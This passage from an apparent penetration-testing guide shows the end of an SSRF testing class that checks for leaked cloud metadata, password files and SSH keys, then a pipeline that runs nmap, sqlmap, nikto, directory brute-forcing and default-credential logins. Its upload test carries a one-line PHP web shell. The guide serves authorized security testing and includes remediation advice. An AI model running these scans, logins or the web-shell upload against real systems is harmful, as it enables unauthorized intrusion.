        def stub(text='', seconds=0.0):
            # status_code 0 signals a timed-out or failed request; the
            # nested SimpleNamespace keeps elapsed.total_seconds() callable
            # just like a real requests.Response
            return SimpleNamespace(
                status_code=0,
                text=text,
                elapsed=SimpleNamespace(total_seconds=lambda: seconds)
            )

        try:
            return self.session.get(url, timeout=timeout)
        except requests.exceptions.Timeout:
            return stub(seconds=timeout)
        except requests.exceptions.ConnectionError:
            return stub()
        except Exception as e:
            return stub(text=str(e))
    
    def is_ssrf_successful(self, response, target):
        """Determine if SSRF was successful"""
        if response.status_code == 0:
            return False
        
        # Check for common indicators
        indicators = [
            # Status codes
            response.status_code in [200, 201, 202, 203, 204, 205, 206],
            
            # Content indicators
            'root:' in response.text if 'passwd' in target else False,
            'html' in response.text.lower(),
            'http' in response.text.lower(),
            '<!DOCTYPE' in response.text,
            
            # Length indicators
            len(response.text) > 100,  # Meaningful response
            
            # Time indicators (for blind SSRF)
            response.elapsed.total_seconds() > 2,
        ]
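
        # These heuristics are deliberately loose (length and timing alone
        # will flag benign responses); diff every hit against a baseline
        # request before reporting it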
        
        return any(indicators)
    
    def check_protocol_smuggling(self, response):
        """Check for protocol smuggling indicators"""
        smuggling_indicators = [
            '400 Bad Request',
            'Invalid HTTP',
            'malformed',
            'invalid request',
            'protocol violation',
        ]
        
        return any(indicator in response.text for indicator in smuggling_indicators)
    
    def is_cloud_metadata(self, response_text, description):
        """Check if response contains cloud metadata"""
        metadata_indicators = {
            'AWS': ['instance-id', 'ami-id', 'instance-type', 'availability-zone'],
            'GCP': ['google', 'computeMetadata', 'project-id'],
            'Azure': ['azure', 'subscriptionId', 'resourceGroupName'],
            'Kubernetes': ['kubernetes', 'pod', 'namespace', 'serviceaccount'],
        }
        
        for provider, indicators in metadata_indicators.items():
            if provider.lower() in description.lower():
                return any(indicator in response_text.lower() for indicator in indicators)
        
        return False
    
    def is_file_content(self, response_text, description):
        """Check if response contains file content"""
        file_indicators = {
            'Linux users': ['root:', 'daemon:', 'bin:'],
            'Linux passwords': ['root:', 'shadow', 'encrypted'],
            'Hosts file': ['localhost', '127.0.0.1'],
            'Environment': ['PATH=', 'HOME=', 'USER='],
            'SSH private key': ['-----BEGIN RSA PRIVATE KEY-----', '-----BEGIN PRIVATE KEY-----'],
            'App config': ['database', 'password', 'secret', 'key'],
        }
        
        for file_type, indicators in file_indicators.items():
            if file_type.lower() in description.lower():
                return any(indicator in response_text for indicator in indicators)
        
        return len(response_text) > 50 and '<html' not in response_text.lower()
    
    def run_all_tests(self):
        """Run all SSRF tests"""
        print(f"[*] Starting advanced SSRF testing on {self.target_url}")
        
        all_findings = []
        
        for technique_name, technique_func in self.techniques.items():
            print(f"[*] Testing {technique_name}...")
            try:
                findings = technique_func()
                all_findings.extend(findings)
                print(f"[+] {technique_name}: {len(findings)} findings")
            except Exception as e:
                print(f"[-] {technique_name} failed: {e}")
        
        # Generate report
        report = self.generate_report(all_findings)
        return report
    
    def generate_report(self, findings):
        """Generate SSRF test report"""
        report = {
            'target': self.target_url,
            'vulnerable_parameter': self.vulnerable_param,
            'total_findings': len(findings),
            'findings_by_technique': {},
            'findings_by_severity': {},
            'detailed_findings': findings,
            'recommendations': self.generate_recommendations(findings)
        }
        
        # Categorize findings
        for finding in findings:
            # By technique
            technique = finding.get('technique', 'unknown')
            if technique not in report['findings_by_technique']:
                report['findings_by_technique'][technique] = 0
            report['findings_by_technique'][technique] += 1
            
            # By severity
            severity = self.assess_severity(finding)
            if severity not in report['findings_by_severity']:
                report['findings_by_severity'][severity] = 0
            report['findings_by_severity'][severity] += 1
            finding['severity'] = severity
        
        return report
    
    def assess_severity(self, finding):
        """Assess severity of SSRF finding"""
        technique = finding.get('technique', '')
        evidence = finding.get('evidence', '').lower()
        
        if 'cloud_metadata' in technique and 'credential' in evidence:
            return 'CRITICAL'
        elif 'file_scheme' in technique and ('shadow' in evidence or 'id_rsa' in evidence):
            return 'CRITICAL'
        elif 'internal_services' in technique and ('3306' in evidence or '5432' in evidence):
            return 'HIGH'
        elif 'gopher_protocol' in technique:
            return 'HIGH'
        elif 'basic_ssrf' in technique and '127.0.0.1' in evidence:
            return 'MEDIUM'
        else:
            return 'LOW'
    
    def generate_recommendations(self, findings):
        """Generate SSRF prevention recommendations"""
        recommendations = []
        
        if any('basic_ssrf' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'Input Validation',
                'priority': 'HIGH',
                'recommendations': [
                    'Implement allow-list for URLs instead of block-list',
                    'Validate and sanitize all user-supplied URLs',
                    'Use proper URL parsing libraries (not regex)',
                    'Reject URLs with private/reserved IP addresses',
                    'Block loopback and localhost addresses'
                ]
            })
        
        if any('filter_bypass' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'Filter Bypass Protection',
                'priority': 'HIGH',
                'recommendations': [
                    'Normalize URLs before validation (lowercase, decode)',
                    'Resolve DNS and validate IP addresses',
                    'Check for IP address variations (decimal, hex, octal)',
                    'Implement multiple validation layers',
                    'Use network-layer filtering in addition to application-layer'
                ]
            })
        
        if any('cloud_metadata' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'Cloud Metadata Protection',
                'priority': 'CRITICAL',
                'recommendations': [
                    'Block access to cloud metadata endpoints (169.254.169.254, etc.)',
                    'Use instance metadata service v2 (IMDSv2) for AWS',
                    'Restrict metadata service with firewall rules',
                    'Use service accounts with minimum necessary permissions',
                    'Regularly rotate credentials and tokens'
                ]
            })
        
        if any('file_scheme' in f.get('technique', '') for f in findings):
            recommendations.append({
                'category': 'File Scheme Protection',
                'priority': 'HIGH',
                'recommendations': [
                    'Disable file:// protocol in URL fetching',
                    'Use secure URL fetching libraries with protocol restrictions',
                    'Implement content-type validation',
                    'Sandbox URL fetching operations',
                    'Monitor for local file read attempts'
                ]
            })
        
        # General recommendations
        recommendations.append({
            'category': 'General SSRF Protection',
            'priority': 'MEDIUM',
            'recommendations': [
                'Implement outbound firewall rules to restrict internal access',
                'Use network segmentation to isolate sensitive services',
                'Monitor for SSRF attempts in logs',
                'Conduct regular penetration testing for SSRF',
                'Educate developers about SSRF risks and prevention'
            ]
        })
        
        return recommendations

# Usage
exploiter = AdvancedSSRFExploiter(
    "http://target.com/fetch",
    "url"
)

report = exploiter.run_all_tests()

print(f"\n{'='*60}")
print("ADVANCED SSRF TESTING REPORT")
print(f"{'='*60}")
print(f"Target: {report['target']}")
print(f"Vulnerable Parameter: {report['vulnerable_parameter']}")
print(f"Total Findings: {report['total_findings']}")

print(f"\nFindings by Technique:")
for technique, count in report['findings_by_technique'].items():
    print(f"  {technique}: {count}")

print(f"\nFindings by Severity:")
for severity, count in report['findings_by_severity'].items():
    print(f"  {severity}: {count}")

# Show critical findings
critical_findings = [f for f in report['detailed_findings'] 
                    if f.get('severity') in ['CRITICAL', 'HIGH']]

if critical_findings:
    print(f"\nCRITICAL/HIGH SEVERITY FINDINGS:")
    for finding in critical_findings[:3]:
        print(f"  - [{finding['severity']}] {finding.get('technique')}")
        print(f"    {finding.get('evidence', '')[:100]}...")

print(f"\nSECURITY RECOMMENDATIONS:")
for rec in report['recommendations']:
    print(f"\n[{rec['priority']}] {rec['category']}:")
    for recommendation in rec['recommendations'][:3]:
        print(f"  • {recommendation}")

```

Chapter 11: Comprehensive Security Testing Automation

11.1 Integrated Security Testing Pipeline

```

#!/usr/bin/env python3
"""
Integrated Security Testing Pipeline
Combines multiple security testing tools and techniques
"""
import subprocess
import json
import yaml
import xml.etree.ElementTree as ET
from pathlib import Path
from datetime import datetime
import concurrent.futures
import time
import requests
import sys

class SecurityTestingPipeline:
    def __init__(self, target, config_file=None):
        self.target = target
        self.config = self.load_config(config_file)
        self.results = {}
        self.report = {}
        
    def load_config(self, config_file):
        """Load pipeline configuration"""
        default_config = {
            'scan_types': {
                'reconnaissance': True,
                'vulnerability_scanning': True,
                'authentication_testing': True,
                'api_testing': True,
                'business_logic': True,
                'reporting': True
            },
            'tools': {
                'nmap': {
                    'enabled': True,
                    'ports': '1-1000',
                    'scripts': ['vuln', 'safe', 'discovery']
                },
                'nikto': {
                    'enabled': True,
                    'timeout': 300
                },
                'sqlmap': {
                    'enabled': True,
                    'risk': 1,
                    'level': 1
                },
                'zap': {
                    'enabled': True,
                    'mode': 'full'
                },
                'custom_tests': {
                    'enabled': True
                }
            },
            'reporting': {
                'format': ['html', 'json', 'pdf'],
                'output_dir': './reports'
            }
        }
        
        if config_file:
            with open(config_file) as f:
                user_config = yaml.safe_load(f) or {}
                # Shallow merge: each top-level key in the user config
                # replaces the corresponding default section wholesale
                default_config.update(user_config)
        
        return default_config
    
    def run_pipeline(self):
        """Run the complete security testing pipeline"""
        print(f"[*] Starting security testing pipeline for {self.target}")
        print(f"[*] Start time: {datetime.now()}")
        
        pipeline_steps = [
            ('Initialization', self.initialize_pipeline),
            ('Reconnaissance', self.run_reconnaissance),
            ('Vulnerability Scanning', self.run_vulnerability_scanning),
            ('Authentication Testing', self.run_authentication_testing),
            ('API Testing', self.run_api_testing),
            ('Business Logic Testing', self.run_business_logic_tests),
            ('Custom Tests', self.run_custom_tests),
            ('Reporting', self.generate_report)
        ]
        
        for step_name, step_func in pipeline_steps:
            if self.should_run_step(step_name):
                print(f"\n[*] Running step: {step_name}")
                try:
                    result = step_func()
                    self.results[step_name] = result
                    print(f"[+] {step_name} completed successfully")
                except Exception as e:
                    print(f"[-] {step_name} failed: {e}")
                    self.results[step_name] = {'error': str(e)}
        
        print(f"\n[*] Pipeline completed at {datetime.now()}")
        return self.results
    
    def should_run_step(self, step_name):
        """Check if step should run based on configuration"""
        step_mapping = {
            'Reconnaissance': 'reconnaissance',
            'Vulnerability Scanning': 'vulnerability_scanning',
            'Authentication Testing': 'authentication_testing',
            'API Testing': 'api_testing',
            'Business Logic Testing': 'business_logic',
            'Reporting': 'reporting'
        }
        
        if step_name in step_mapping:
            return self.config['scan_types'].get(step_mapping[step_name], True)
        
        return True
    
    def initialize_pipeline(self):
        """Initialize the testing pipeline"""
        # Create output directory
        output_dir = Path(self.config['reporting']['output_dir'])
        output_dir.mkdir(parents=True, exist_ok=True)
        
        # Create session file
        session_data = {
            'target': self.target,
            'start_time': datetime.now().isoformat(),
            'config': self.config
        }
        
        session_file = output_dir / 'session.json'
        with open(session_file, 'w') as f:
            json.dump(session_data, f, indent=2)
        
        return {'status': 'initialized', 'session_file': str(session_file)}
    
    def run_reconnaissance(self):
        """Run reconnaissance phase"""
        recon_results = {}
        
        # 1. Nmap scan
        if self.config['tools']['nmap']['enabled']:
            print("[*] Running Nmap scan...")
            nmap_result = self.run_nmap_scan()
            recon_results['nmap'] = nmap_result
        
        # 2. Directory enumeration
        print("[*] Running directory enumeration...")
        dir_result = self.run_directory_enumeration()
        recon_results['directory_enumeration'] = dir_result
        
        # 3. Subdomain enumeration
        print("[*] Running subdomain enumeration...")
        subdomain_result = self.run_subdomain_enumeration()
        recon_results['subdomain_enumeration'] = subdomain_result
        
        # 4. Technology detection
        print("[*] Detecting technologies...")
        tech_result = self.detect_technologies()
        recon_results['technology_detection'] = tech_result
        
        return recon_results
    
    def run_nmap_scan(self):
        """Run Nmap scan"""
        ports = self.config['tools']['nmap']['ports']
        scripts = self.config['tools']['nmap']['scripts']
        
        # -sC is omitted: the --script list below already controls which
        # NSE scripts run, and Nmap expects them as one comma-separated value
        cmd = ['nmap', '-sV', '-p', ports, '-oA', 'nmap_scan']

        if scripts:
            cmd.extend(['--script', ','.join(scripts)])

        cmd.append(self.target)
        
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
            
            # Parse Nmap output
            parsed_results = self.parse_nmap_output(result.stdout)
            
            return {
                'command': ' '.join(cmd),
                'returncode': result.returncode,
                'stdout': result.stdout[:1000],
                'parsed_results': parsed_results
            }
        except subprocess.TimeoutExpired:
            return {'error': 'Nmap scan timed out after 10 minutes'}
        except Exception as e:
            return {'error': str(e)}
    
    def parse_nmap_output(self, nmap_output):
        """Parse Nmap output into structured data"""
        parsed = {
            'open_ports': [],
            'services': [],
            'vulnerabilities': []
        }
        
        # Simple parsing - in reality, use nmap parser library
        lines = nmap_output.split('\n')
        
        for line in lines:
            if '/tcp' in line or '/udp' in line:
                # Port line: 80/tcp open http
                parts = line.split()
                if len(parts) >= 3:
                    port_proto = parts[0]
                    state = parts[1]
                    service = parts[2] if len(parts) > 2 else 'unknown'
                    
                    parsed['open_ports'].append({
                        'port': port_proto,
                        'state': state,
                        'service': service
                    })
        
        return parsed
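
    # --- Minimal stub parsers (assumptions, not production parsers) ----
    # These keep the pipeline runnable end-to-end; swap in proper parsing
    # (e.g. the JSON output modes of ffuf and gobuster) for real use.
    def parse_gobuster_output(self, output):
        """Collect lines that look like discovered paths"""
        hits = [line.split()[0] for line in output.splitlines()
                if line.startswith('/')]
        return {'paths_found': len(hits), 'paths': hits[:20]}

    def parse_ffuf_output(self, output):
        """Keep a raw preview; ffuf's JSON output is the better source"""
        return {'raw_preview': output[:1000]}

    def parse_whatweb_output(self, output):
        """Keep WhatWeb's fingerprint line as-is"""
        return {'raw_preview': output[:1000]}

    def parse_nikto_output(self, output):
        """Nikto prefixes findings with '+ '"""
        return [line.strip() for line in output.splitlines()
                if line.startswith('+')]

    def parse_sqlmap_output(self, output):
        """Flag whether sqlmap reported an injectable parameter"""
        lowered = output.lower()
        return {'injectable': 'is vulnerable' in lowered or
                              'injectable' in lowered,
                'raw_preview': output[:500]}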
    
    def run_directory_enumeration(self):
        """Run directory enumeration"""
        tools = ['gobuster', 'ffuf', 'dirb']
        
        dir_results = {}
        
        for tool in tools:
            try:
                if tool == 'gobuster':
                    cmd = ['gobuster', 'dir', '-u', self.target, '-w', 
                          '/usr/share/wordlists/dirb/common.txt', '-t', '50']
                    result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
                    dir_results['gobuster'] = self.parse_gobuster_output(result.stdout)
                
                elif tool == 'ffuf':
                    cmd = ['ffuf', '-u', f'{self.target}/FUZZ', '-w',
                          '/usr/share/wordlists/dirb/common.txt', '-t', '50']
                    result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
                    dir_results['ffuf'] = self.parse_ffuf_output(result.stdout)
            
            except Exception as e:
                dir_results[tool] = {'error': str(e)}
        
        return dir_results
    
    def run_subdomain_enumeration(self):
        """Run subdomain enumeration"""
        # Extract domain from target
        from urllib.parse import urlparse
        parsed = urlparse(self.target)
        domain = parsed.netloc or parsed.path
        
        # Remove port if present
        if ':' in domain:
            domain = domain.split(':')[0]
        
        subdomain_results = {}
        
        try:
            # Use subfinder if available
            cmd = ['subfinder', '-d', domain, '-silent']
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=300)
            subdomains = result.stdout.strip().split('\n')
            
            subdomain_results['subfinder'] = {
                'domain': domain,
                'subdomains_found': len(subdomains),
                'subdomains': subdomains[:10]  # First 10
            }
        
        except Exception as e:
            subdomain_results['error'] = str(e)
        
        return subdomain_results
    
    def detect_technologies(self):
        """Detect web technologies"""
        tech_results = {}
        
        try:
            # Use Wappalyzer or WhatWeb
            cmd = ['whatweb', '-a', '3', self.target]
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=60)
            
            # Parse WhatWeb output
            tech_results['whatweb'] = self.parse_whatweb_output(result.stdout)
        
        except Exception as e:
            tech_results['error'] = str(e)
        
        return tech_results
    
    def run_vulnerability_scanning(self):
        """Run vulnerability scanning"""
        vuln_results = {}
        
        # 1. Nikto scan
        if self.config['tools']['nikto']['enabled']:
            print("[*] Running Nikto scan...")
            nikto_result = self.run_nikto_scan()
            vuln_results['nikto'] = nikto_result
        
        # 2. SQLMap scan (if SQLi suspected)
        if self.config['tools']['sqlmap']['enabled']:
            print("[*] Running SQLMap scan...")
            sqlmap_result = self.run_sqlmap_scan()
            vuln_results['sqlmap'] = sqlmap_result
        
        # 3. OWASP ZAP scan
        if self.config['tools']['zap']['enabled']:
            print("[*] Running OWASP ZAP scan...")
            zap_result = self.run_zap_scan()
            vuln_results['zap'] = zap_result
        
        return vuln_results
    
    def run_nikto_scan(self):
        """Run Nikto vulnerability scanner"""
        timeout = self.config['tools']['nikto']['timeout']
        
        cmd = ['nikto', '-h', self.target, '-o', 'nikto_report.html', '-Format', 'html']
        
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=timeout)
            
            # Parse Nikto output
            vulnerabilities = self.parse_nikto_output(result.stdout)
            
            return {
                'command': ' '.join(cmd),
                'returncode': result.returncode,
                'vulnerabilities_found': len(vulnerabilities),
                'vulnerabilities': vulnerabilities[:5]  # First 5
            }
        except subprocess.TimeoutExpired:
            return {'error': f'Nikto scan timed out after {timeout} seconds'}
        except Exception as e:
            return {'error': str(e)}
    
    def run_sqlmap_scan(self):
        """Run SQLMap scanner"""
        risk = self.config['tools']['sqlmap']['risk']
        level = self.config['tools']['sqlmap']['level']
        
        # Test a common parameter
        test_url = f"{self.target}?id=1"
        
        cmd = ['sqlmap', '-u', test_url, '--batch', '--risk', str(risk), 
               '--level', str(level), '--flush-session']
        
        try:
            result = subprocess.run(cmd, capture_output=True, text=True, timeout=600)
            
            # Parse SQLMap output
            sqlmap_result = self.parse_sqlmap_output(result.stdout)
            
            return {
                'command': ' '.join(cmd),
                'returncode': result.returncode,
                'result': sqlmap_result
            }
        except subprocess.TimeoutExpired:
            return {'error': 'SQLMap scan timed out after 10 minutes'}
        except Exception as e:
            return {'error': str(e)}
    
    def run_zap_scan(self):
        """Run OWASP ZAP scan"""
        mode = self.config['tools']['zap']['mode']
        
        # ZAP requires different setup
        # For this example, we'll simulate
        zap_result = {
            'status': 'simulated',
            'note': 'In production, integrate with ZAP API',
            'vulnerabilities': [
                {'type': 'XSS', 'severity': 'High', 'url': f'{self.target}/search?q=<script>'},
                {'type': 'CSRF', 'severity': 'Medium', 'url': f'{self.target}/profile'},
                {'type': 'Information Disclosure', 'severity': 'Low', 'url': f'{self.target}/debug'}
            ]
        }
        
        return zap_result
    
    def run_authentication_testing(self):
        """Run authentication testing"""
        auth_results = {}
        
        # Test common authentication weaknesses (only the checks
        # implemented below; add password-reset and session-management
        # tests to this list as you implement them)
        tests = [
            self.test_default_credentials,
            self.test_weak_passwords
        ]
        
        with concurrent.futures.ThreadPoolExecutor(max_workers=3) as executor:
            future_to_test = {executor.submit(test): test.__name__ for test in tests}
            
            for future in concurrent.futures.as_completed(future_to_test):
                test_name = future_to_test[future]
                try:
                    result = future.result()
                    auth_results[test_name] = result
                except Exception as e:
                    auth_results[test_name] = {'error': str(e)}
        
        return auth_results
    
    def test_default_credentials(self):
        """Test for default credentials"""
        # Common default credentials
        defaults = [
            ('admin', 'admin'),
            ('admin', 'password'),
            ('admin', '123456'),
            ('root', 'root'),
            ('test', 'test'),
            ('guest', 'guest')
        ]
        
        login_url = f"{self.target}/login"
        results = []
        
        for username, password in defaults[:3]:  # Test first 3
            try:
                response = requests.post(
                    login_url,
                    data={'username': username, 'password': password},
                    timeout=5
                )
                
                if response.status_code == 200 and 'login' not in response.text.lower():
                    results.append({
                        'username': username,
                        'password': password,
                        'status': 'SUCCESS',
                        'evidence': 'Default credentials accepted'
                    })
                else:
                    results.append({
                        'username': username,
                        'password': password,
                        'status': 'FAILED'
                    })
            except Exception as e:
                results.append({'error': str(e)})
        
        return results
    
    def test_weak_passwords(self):
        """Test for weak password policy"""
        # Test if weak passwords are accepted
        weak_passwords = [
            'password',
            '123456',
            'qwerty',
            'letmein',
            'welcome'
        ]
        
        register_url = f"{self.target}/register"
        results = []
        
        for password in weak_passwords[:2]:  # Test first 2
            try:
                response = requests.post(
                    register_url,
                    json={
                        'username': f'test_{int(time.time())}',
                        'password': password,
                        'email': f'test{int(time.time())}@example.com'
                    },
                    timeout=5
                )
                
                if response.status_code == 200:
                    results.append({
                        'password': password,
                        'status': 'ACCEPTED',
                        'evidence': 'Weak password accepted during registration'
                    })
                else:
                    results.append({
                        'password': password,
                        'status': 'REJECTED'
                    })
            except Exception as e:
                results.append({'error': str(e)})
        
        return results
    
    def run_api_testing(self):
        """Run API security testing"""
        api_results = {}
        
        # Discover API endpoints
        endpoints = self.discover_api_endpoints()
        api_results['endpoints'] = endpoints
        
        # Test each endpoint; look the test methods up by name so that
        # checks not yet implemented in this sketch are skipped cleanly
        tests = [
            getattr(self, name) for name in (
                'test_api_authentication',
                'test_api_rate_limiting',
                'test_api_input_validation'
            ) if hasattr(self, name)
        ]
        
        for test in tests:
            test_name = test.__name__
            try:
                result = test()
                api_results[test_name] = result
            except Exception as e:
                api_results[test_name] = {'error': str(e)}
        
        return api_results
    
    def discover_api_endpoints(self):
        """Discover API endpoints"""
        endpoints = []
        
        # Common API paths
        common_paths = [
            '/api',
            '/api/v1',
            '/api/v2',
            '/graphql',
            '/rest',
            '/soap'
        ]
        
        for path in common_paths:
            url = f"{self.target}{path}"
            try:
                response = requests.get(url, timeout=5)
                if response.status_code != 404:
                    endpoints.append({
                        'path': path,
                        'status_code': response.status_code,
                        'content_type': response.headers.get('Content-Type', '')
                    })
            except requests.RequestException:
                pass  # endpoint unreachable; move on
        
        return endpoints
    
    def run_business_logic_tests(self):
        """Run business logic tests"""
        logic_results = {}
        
        tests = [
            self.test_price_manipulation
            # add quantity-manipulation and workflow-bypass checks here
        ]
        
        for test in tests:
            test_name = test.__name__
            try:
                result = test()
                logic_results[test_name] = result
            except Exception as e:
                logic_results[test_name] = {'error': str(e)}
        
        return logic_results
    
    def test_price_manipulation(self):
        """Test for price manipulation vulnerabilities"""
        # Try to change price in cart/checkout
        cart_url = f"{self.target}/api/cart"
        checkout_url = f"{self.target}/api/checkout"
        
        results = []
        
        # Test 1: Negative price
        try:
            response = requests.post(
                cart_url,
                json={'item_id': '123', 'price': -10},
                timeout=5
            )
            
            if response.status_code == 200:
                results.append({
                    'test': 'negative_price',
                    'status': 'VULNERABLE',
                    'evidence': 'Negative price accepted'
                })
        except requests.RequestException:
            pass
        
        # Test 2: Very high price
        try:
            response = requests.post(
                checkout_url,
                json={'total': 0.01},  # Try to pay 1 cent
                timeout=5
            )
            
            if response.status_code == 200:
                results.append({
                    'test': 'price_override',
                    'status': 'VULNERABLE',
                    'evidence': 'Price override possible'
                })
        except requests.RequestException:
            pass
        
        return results
    
    def run_custom_tests(self):
        """Run custom security tests"""
        custom_results = {}
        
        # Add custom tests here based on the application; only the file
        # upload check is implemented in this sketch - wire in the XXE
        # and SSRF tooling from the earlier chapters as needed
        custom_tests = [
            self.test_file_upload
        ]
        
        for test in custom_tests:
            test_name = test.__name__
            try:
                result = test()
                custom_results[test_name] = result
            except Exception as e:
                custom_results[test_name] = {'error': str(e)}
        
        return custom_results
    
    def test_file_upload(self):
        """Test file upload vulnerabilities"""
        upload_url = f"{self.target}/upload"
        
        results = []
        
        # Test dangerous file types
        dangerous_files = [
            ('shell.php', '<?php system($_GET["cmd"]); ?>', 'application/x-php'),
            ('shell.jsp', '<%@ page import="java.util.*" %>', 'application/jsp'),
            ('shell.asp', '<% Response.Write("Hello") %>', 'application/asp'),
        ]
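
        # Many upload filters trust the client-supplied Content-Type, so
        # pairing a scripting extension with a benign MIME type (or the
        # reverse) is a worthwhile follow-up variation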
        
        for filename, content, content_type in dangerous_files[:1]:  # Test first
            files = {'file': (filename, content, content_type)}
            
            try:
                response = requests.post(upload_url, files=files, timeout=5)
                
                if response.status_code == 200:
                    # Check if file was uploaded
                    if 'upload' in response.text.lower() or 'success' in response.text.lower():
                        results.append({
                            'filename': filename,
                            'status': 'VULNERABLE',
                            'evidence': f'Dangerous file {filename} uploaded successfully'
                        })
            except requests.RequestException:
                pass
        
        return results
    
    def generate_report(self):
        """Generate comprehensive security report"""
        print("[*] Generating security report...")
        
        report = {
            'metadata': {
                'target': self.target,
                'scan_date': datetime.now().isoformat(),
                'duration': 'N/A',  # Would calculate based on start/end times
                'pipeline_version': '1.0'
            },
            'executive_summary': self.generate_executive_summary(),
            'detailed_findings': self.results,
            'risk_assessment': self.assess_risk(),
            'recommendations': self.generate_recommendations(),
            'appendix': {
                'tools_used': list(self.config['tools'].keys()),
                'scan_configuration': self.config
            }
        }
        
        # Save report in different formats
        output_dir = Path(self.config['reporting']['output_dir'])
        
        if 'json' in self.config['reporting']['format']:
            json_file = output_dir / 'security_report.json'
            with open(json_file, 'w') as f:
                json.dump(report, f, indent=2)
        
        if 'html' in self.config['reporting']['format']:
            html_report = self.generate_html_report(report)
            html_file = output_dir / 'security_report.html'
            with open(html_file, 'w') as f:
                f.write(html_report)
        
        self.report = report
        return report
    
    def generate_executive_summary(self):
        """Generate executive summary"""
        summary = {
            'total_findings': 0,
            'critical_findings': 0,
            'high_findings': 0,
            'medium_findings': 0,
            'low_findings': 0,
            'overall_risk': 'Unknown'
        }
        
        # Count findings from different scans
        # This would be more sophisticated in reality
        
        return summary
    
    def assess_risk(self):
        """Assess overall risk"""
        risk_levels = ['Critical', 'High', 'Medium', 'Low', 'Informational']
        
        # Simple risk assessment
        # In reality, this would analyze all findings
        
        return {
            'overall_risk': 'Medium',
            'confidence': 'Medium',
            'factors_considered': ['Vulnerabilities found', 'Data sensitivity', 'Attack surface']
        }
    
    def generate_recommendations(self):
        """Generate security recommendations"""
        recommendations = {
            'immediate': [
                'Patch critical vulnerabilities within 24 hours',
                'Change default credentials immediately',
                'Implement WAF rules for detected attack patterns'
            ],
            'short_term': [
                'Complete vulnerability remediation within 7 days',
                'Implement security monitoring and alerting',
                'Conduct developer security training'
            ],
            'long_term': [
                'Implement secure SDLC processes',
                'Regular security testing and penetration testing',
                'Continuous security monitoring and improvement'
            ]
        }
        
        return recommendations
    
    def generate_html_report(self, report_data):
        """Generate HTML report"""
        html_template = """
        <!DOCTYPE html>
        <html>
        <head>
            <title>Security Assessment Report</title>
            <style>
                body {{ font-family: Arial, sans-serif; margin: 40px; }}
                h1 {{ color: #333; }}
                h2 {{ color: #555; border-bottom: 1px solid #ddd; padding-bottom: 10px; }}
                .critical {{ color: #d9534f; font-weight: bold; }}
                .high {{ color: #f0ad4e; }}
                .medium {{ color: #5bc0de; }}
                .low {{ color: #5cb85c; }}
                table {{ border-collapse: collapse; width: 100%; margin-bottom: 20px; }}
                th, td {{ border: 1px solid #ddd; padding: 8px; text-align: left; }}
                th {{ background-color: #f2f2f2; }}
                .summary-box {{ background: #f8f9fa; border: 1px solid #dee2e6; padding: 20px; border-radius: 5px; }}
            </style>
        </head>
        <body>
            <h1>Security Assessment Report</h1>
            <div class="summary-box">
                <h2>Executive Summary</h2>
                <p><strong>Target:</strong> {target}</p>
                <p><strong>Scan Date:</strong> {scan_date}</p>
                <p><strong>Overall Risk:</strong> <span class="{risk_class}">{overall_risk}</span></p>
            </div>
            
            <h2>Findings Summary</h2>
            <table>
                <tr>
                    <th>Severity</th>
                    <th>Count</th>
                </tr>
                <tr><td class="critical">Critical</td><td>{critical_count}</td></tr>
                <tr><td class="high">High</td><td>{high_count}</td></tr>
                <tr><td class="medium">Medium</td><td>{medium_count}</td></tr>
                <tr><td class="low">Low</td><td>{low_count}</td></tr>
            </table>
            
            <h2>Recommendations</h2>
            <h3>Immediate Actions (24 hours)</h3>
            <ul>
                {immediate_recs}
            </ul>
            
            <h3>Short Term Actions (7 days)</h3>
            <ul>
                {short_term_recs}
            </ul>
            
            <h3>Long Term Actions (30+ days)</h3>
            <ul>
                {long_term_recs}
            </ul>
            
            <hr>
            <p><em>Report generated by Security Testing Pipeline v1.0</em></p>
        </body>
        </html>
        """
        
        # Fill template
        risk_class = report_data['risk_assessment']['overall_risk'].lower()
        
        filled_html = html_template.format(
            target=report_data['metadata']['target'],
            scan_date=report_data['metadata']['scan_date'],
            overall_risk=report_data['risk_assessment']['overall_risk'],
            risk_class=risk_class,
            critical_count=report_data['executive_summary']['critical_findings'],
            high_count=report_data['executive_summary']['high_findings'],
            medium_count=report_data['executive_summary']['medium_findings'],
            low_count=report_data['executive_summary']['low_findings'],
            immediate_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['immediate']),
            short_term_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['short_term']),
            long_term_recs=''.join(f'<li>{rec}</li>' for rec in report_data['recommendations']['long_term'])
        )
        
        return filled_html

# Usage
pipeline = SecurityTestingPipeline(
    target="http://target.com",
    config_file="security_config.yaml"  # Optional
)

results = pipeline.run_pipeline()

print(f"\n{'='*60}")
print("SECURITY TESTING PIPELINE COMPLETE")
print(f"{'='*60}")

# Print summary (the Reporting step returns the report dict directly)
report = results.get('Reporting') or {}
if 'risk_assessment' in report:
    print(f"\nReport generated: {pipeline.config['reporting']['output_dir']}/")
    print(f"Overall Risk: {report['risk_assessment']['overall_risk']}")

# Summarize which pipeline steps completed
print(f"\nPipeline Steps Completed:")
for step, result in results.items():
    if isinstance(result, dict) and 'error' not in result:
        print(f"  ✓ {step}")
    else:
        print(f"  ✗ {step} (Error)")

print(f"\n[*] Detailed reports available in {pipeline.config['reporting']['output_dir']}/")

```

Conclusion

This comprehensive guide has covered advanced techniques, tools, and methodologies for testing OWASP Top 10 vulnerabilities. Key takeaways:

1. Automation is Critical

  • Integrate security testing into CI/CD pipelines
  • Use tools like ZAP, Nuclei, and custom scripts
  • Implement continuous security monitoring

2. Think Beyond Basic Tests

  • Business logic flaws require creative testing
  • Race conditions need specialized tools
  • SSRF requires multiple bypass techniques

3. Context Matters

  • Understand the application's business purpose
  • Test based on risk (sensitive data, functionality)
  • Consider the technology stack

4. Combine Multiple Approaches

  • Automated scanning + manual testing
  • Static + dynamic analysis
  • Black-box + grey-box testing

5. Stay Updated

  • New vulnerabilities emerge constantly
  • Tools and techniques evolve
  • Follow security research and updates

Essential Next Steps:

  1. Implement a Security Testing Pipeline like the one shown in Chapter 11
  2. Create Custom Tooling for your specific technology stack
